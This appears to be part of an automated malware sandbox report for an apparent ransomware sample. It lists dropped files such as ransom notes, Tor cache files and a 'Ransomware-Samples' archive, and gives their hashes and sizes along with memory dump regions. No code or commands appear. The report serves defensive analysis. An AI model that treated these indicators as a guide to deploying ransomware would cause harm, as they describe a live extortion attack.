6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___K5YY_.hta

Filesize
75KB

MD5
e085ec1765454ed4c02934eea611a5bd

SHA1
59559028c9491b3ddc3f3fe26b67607a7dcd39f3

SHA256
aabffdbfb119f27ad48d051814eafdc3d14164ee4cd8dd74597fac13b6fa5086

SHA512
e5c9166a470c4db60ecf7d1ba26055a002ed9049720de80f2e7fe88d1fc35b976b1ee243373e9e053bdd5200a470cefff65015120389b949476a6f1410953d0c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___NEI2NG_.txt

Filesize
1KB

MD5
6ff773ea55bd0d088f47ae5d1f141277

SHA1
8e0b0226f8a9ee22906e272a40bf82a020067933

SHA256
23cac2d18aa175308964304465ee685a915b49cb24c0e7e2a50ecad9460ba9d2

SHA512
f46e97f09c9b3b1af220b06d363f0a226a157f6dea36217e5dca1ad68c7ef46ce08c64e5cb5e25e787f907f6d56713757eb203278acbba0d28b136dc00a648b5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
10KB

MD5
7bef789766bdb6f83875a0340f7a438c

SHA1
6a85789ea8ebf827d5ab491c4235d1d520bd2659

SHA256
0f2f58b6ec42c9e0b1effdc089c22d65f1058a608b0f171a92d1746cafc1f290

SHA512
09b5d3c9ca99b7a9115454ef7b61d4686322f9875a165a6fb8cab746c631208c8ab68e37585488711c14aa0fb5a770cb95e4bd08d60ee3e2031e68194913a83b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
7KB

MD5
ccb1123caa7f6c2a833621332b3aa294

SHA1
053cc294e2d35efb148b957994d3685701e786ac

SHA256
6ed2fce9fe670e19a7a3fb124fcd55b3011588cde1fa28dabcad4ecbed531085

SHA512
6fc2fa610f61d09e2d7168214349f36874df7c57c98c425989d0a4f5a810a593207c1de7b0c0628785cdca27861eabffbb8ba5b9203384cedcca0503b63fa325

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
14.0MB

MD5
c6a81a65d049079d85cc4eb73615b529

SHA1
98f342a8bd80af3af788dd45cc24ded3990692f8

SHA256
29a8103d3a540a57dbbceb35fee1ded3cbcd49aea14cb2398b2bfe54d92cc456

SHA512
290c1d938b160791baaa3fbd798a63b3ac44f599ec481defb3fd4a5bd0651593dfd979a9579e4f76b3d4094f95db288839ef077bbf2dd53b736cc4feef88dcc5

Download Submit
C:\Users\Admin\Documents\_R_E_A_D___T_H_I_S___6R04X67Z_.txt

Filesize
1KB

MD5
5e3225ad38b0d921c57fa963e15ba754

SHA1
a418b64b944450814416b0e786b1776630d950bb

SHA256
e25ed8955a487f070b28580d8f5d1c38377f8765bb842d4d5a9c5d5ef7aead4a

SHA512
5741dd94c2414d3b00718eded8a7f734700b32b7632cfb1cc5152b65a0a0ba138b32f7af6efa2a21a9b30e966bd856aca9855ca218d0bf9b16ad8e375aa4dd3c

Download Submit
C:\Users\Admin\Downloads\Ransomware-Samples-main.zip.crdownload

Filesize
15.1MB

MD5
e88a0140466c45348c7b482bb3e103df

SHA1
c59741da45f77ed2350c72055c7b3d96afd4bfc1

SHA256
bab1853454ca6fdd3acd471254101db1b805b601e309a49ec7b4b1fbcfc47ad7

SHA512
2dc9682f4fb6ea520acc505bdbe7671ab7251bf9abd25a5275f0c543a6157d7fa5325b9dce6245e035641ab831d646f0e14f6649f9464f5e97431ab1bf7da431

Download Submit
memory/1976-343-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1976-706-0x0000000000440000-0x0000000000451000-memory.dmp

Filesize
68KB

Download
memory/1976-705-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1976-682-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1976-347-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/1976-340-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/2328-952-0x000000001CAA0000-0x000000001CB02000-memory.dmp

Filesize
392KB

Download
memory/2328-954-0x000000001D000000-0x000000001D052000-memory.dmp

Filesize
328KB

Download
memory/2328-951-0x000000001BC10000-0x000000001BCAC000-memory.dmp

Filesize
624KB

Download
memory/2328-953-0x0000000000EB0000-0x0000000000EB8000-memory.dmp

Filesize
32KB

Download
memory/2328-950-0x000000001C5D0000-0x000000001CA9E000-memory.dmp

Filesize
4.8MB

Download
memory/2740-1040-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/4304-723-0x00007FFC81F80000-0x00007FFC81F90000-memory.dmp

Filesize
64KB

Download
memory/4304-719-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

Filesize
64KB

Download
memory/4304-949-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

Filesize
64KB

Download
memory/4304-948-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

Filesize
64KB

Download
memory/4304-947-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

Filesize
64KB

Download
memory/4304-724-0x00007FFC81F80000-0x00007FFC81F90000-memory.dmp

Filesize
64KB

Download
memory/4304-720-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

Filesize
64KB

Download
memory/4304-717-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

Filesize
64KB

Download
memory/4304-946-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

Filesize
64KB

Download
memory/4304-718-0x00007FFC856D0000-0x00007FFC856E0000-memory.dmp

Filesize
64KB

Download
memory/4736-3186-0x0000000000B40000-0x0000000000C28000-memory.dmp

Filesize
928KB

Download
memory/4736-3204-0x0000000002E00000-0x0000000002E0A000-memory.dmp

Filesize
40KB

Download
memory/4736-3206-0x00000000054F0000-0x0000000005582000-memory.dmp

Filesize
584KB

Download
memory/4736-3207-0x0000000005A60000-0x0000000005B36000-memory.dmp

Filesize
856KB

Download
memory/4736-3208-0x00000000054B0000-0x00000000054BC000-memory.dmp

Filesize
48KB

Download
memory/4736-3211-0x0000000005690000-0x0000000005759000-memory.dmp

Filesize
804KB

Download
memory/4736-3212-0x0000000005890000-0x000000000592C000-memory.dmp

Filesize
624KB

Download
memory/4892-989-0x00000000098F0000-0x000000000990A000-memory.dmp

Filesize
104KB

Download
memory/4892-965-0x0000000004FC0000-0x0000000004FF6000-memory.dmp

Filesize
216KB

Download
memory/4892-966-0x0000000007E50000-0x0000000008478000-memory.dmp

Filesize
6.2MB

Download
memory/4892-967-0x0000000007A30000-0x0000000007A52000-memory.dmp

Filesize
136KB

Download
memory/4892-968-0x0000000007CB0000-0x0000000007D16000-memory.dmp

Filesize
408KB

Download
memory/4892-969-0x0000000007AD0000-0x0000000007B36000-memory.dmp

Filesize
408KB

Download
memory/4892-970-0x0000000008480000-0x00000000087D0000-memory.dmp

Filesize
3.3MB

Download
memory/4892-971-0x0000000007D40000-0x0000000007D5C000-memory.dmp

Filesize
112KB

Download
memory/4892-972-0x0000000008850000-0x000000000889B000-memory.dmp

Filesize
300KB

Download
memory/4892-973-0x0000000008AE0000-0x0000000008B56000-memory.dmp

Filesize
472KB

Download
memory/4892-988-0x000000000A220000-0x000000000A898000-memory.dmp

Filesize
6.5MB

Download
memory/5028-2396-0x0000000070830000-0x0000000070A4C000-memory.dmp

Filesize
2.1MB

Download
memory/5028-2390-0x00000000000A0000-0x000000000039E000-memory.dmp

Filesize
3.0MB

Download
memory/5028-2380-0x00000000000A0000-0x000000000039E000-memory.dmp

Filesize
3.0MB

Download
memory/5028-2379-0x0000000070830000-0x0000000070A4C000-memory.dmp

Filesize
2.1MB

Download
memory/5028-2376-0x0000000070B00000-0x0000000070B1C000-memory.dmp

Filesize
112KB

Download
memory/5028-2377-0x0000000070AD0000-0x0000000070AF2000-memory.dmp

Filesize
136KB

Download
memory/5028-2378-0x0000000070A50000-0x0000000070AC7000-memory.dmp

Filesize
476KB

Download
memory/5028-2375-0x0000000070B20000-0x0000000070BA2000-memory.dmp

Filesize
520KB

Download
memory/5028-2373-0x00000000000A0000-0x000000000039E000-memory.dmp

Filesize
3.0MB

Download
memory/5028-2374-0x0000000070BB0000-0x0000000070C32000-memory.dmp

Filesize
520KB

Download
memory/5028-2358-0x00000000000A0000-0x000000000039E000-memory.dmp

Filesize
3.0MB

Download
memory/5028-2356-0x0000000070B20000-0x0000000070BA2000-memory.dmp

Filesize
520KB

Download
memory/5028-2357-0x0000000070AD0000-0x0000000070AF2000-memory.dmp

Filesize
136KB

Download
memory/5028-2355-0x0000000070830000-0x0000000070A4C000-memory.dmp

Filesize
2.1MB

Download
memory/5028-2354-0x0000000070BB0000-0x0000000070C32000-memory.dmp

Filesize
520KB

Download